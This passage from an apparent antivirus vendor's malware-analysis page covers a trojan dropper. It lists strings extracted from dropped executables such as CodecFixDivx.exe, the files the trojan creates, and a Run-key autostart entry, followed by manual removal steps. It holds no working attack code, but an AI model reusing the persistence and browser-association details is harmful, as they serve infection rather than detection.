ZRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
aero.msstyles
winxp.royale.cjstyles
royale.msstyles
winxp.luna.cjstyles
luna.msstyles
Argument %d must be of type %s.
%d arguments required.
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]

dxdiag.exe_632:

.text
`.data
.rsrc
MSVBVM60.DLL
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
user32.dll
EnumChildWindows
VBA6.DLL
dxdiag.exe

CodecFixDivx.exe_296:

.text
`.rdata
@.data
.rsrc
@.reloc
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
Ole32.dll
KERNEL32.dll
GetProcessHeap
GetCPInfo
zcÁ
:::#222.111 )))
#include "windows.h"
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS></application></compatibility></assembly>
7 7$7(7,7074787
9$9(9,909
0\0c0k0p0t0x0
11F1
0$0(0,000
6 6$6(6,606
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CodecFixDivx.exe

CodecFixDivx.exe_296_rwx_004A0000_0000D000:

.text
`.rdata
@.data
.rsrc
@.reloc
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
IE.HTTP
FirefoxURL
Firefox
ChromeHTML
Chrome
hXXp://
KERNEL32.dll
GetProcessHeap
:::#222.111 )))
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    setdd.exe:272
    7za.exe:1932
    CodecFixDivx.exe:244
    mesox.exe:1904
    %original file name%.exe:348
    dxdiag.exe:632
    irsetup.exe:492

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (1610 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\setdd.exe (10753 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00046f60.a (76 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\000479ef.a (1774 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7za.exe (15192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\winrar-x64-520.exe (65332 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\a.7z (21345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp\execDos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\after.exe (27907 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\msconfig.enc (20 bytes)
    %WinDir%\chromebrowser.exe (164484 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\dxdiag.exe (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\acc.enc (20527 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\CodecFixDivx.enc (16975 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.dat (1209 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CodecFixDivx.exe (18485 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG2.JPG (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\MediaPlayer__3137_il66746.enc (14515 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\IRIMG1.JPG (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\dxdiag.enc (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G963G9AF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHANSXIV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HDQZBC5E\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\setupfiles.txt (44 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@payment[1].txt (303 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@pastebin[1].txt (217 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0XUJW5MR\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\mesox.exe (3972701 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "chromebrowser" = "%WinDir%\chromebrowser.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now